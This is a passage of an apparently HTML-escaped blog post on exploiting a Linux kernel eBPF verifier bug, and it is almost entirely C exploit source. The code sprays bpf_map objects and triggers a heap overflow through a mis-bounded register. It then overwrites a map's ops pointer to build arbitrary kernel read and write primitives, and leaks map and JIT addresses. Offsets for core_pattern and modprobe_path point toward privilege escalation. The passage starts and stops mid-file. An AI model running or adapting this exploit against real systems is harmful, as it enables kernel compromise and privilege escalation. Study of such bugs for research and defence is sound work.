      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx\n&amp;#34;, bpf_map_addr);

  puts(&amp;#34;[*] Restore corrupted map...&amp;#34;);
  uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8;
  aaw64(bpf_map_addr, bpf_map_ops);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-jit-code-using-oob-read--heap-spray&#34;&gt;Leak addr of JIT code using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;254613798&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;254613798&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_jit_addr_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf2 - 1),  // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, map_elem, (actual_val=0xf2; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // overflows heap past map_elem

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  uint16_t ops_containing_ret_offset =
      (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) &amp;amp; 0xffff;
  printf(&amp;#34;ops_containing_ret_offset: 0x%x\n&amp;#34;, ops_containing_ret_offset);
  *(uint16_t*)(&amp;amp;buf[0xf0]) = ops_containing_ret_offset;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t jit_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      jit_addr = val;
      corrupted_map_fd = cur_map_fd;
      return;
    }
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t jit_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] jit_addr: 0x%016lx\n&amp;#34;, jit_addr);

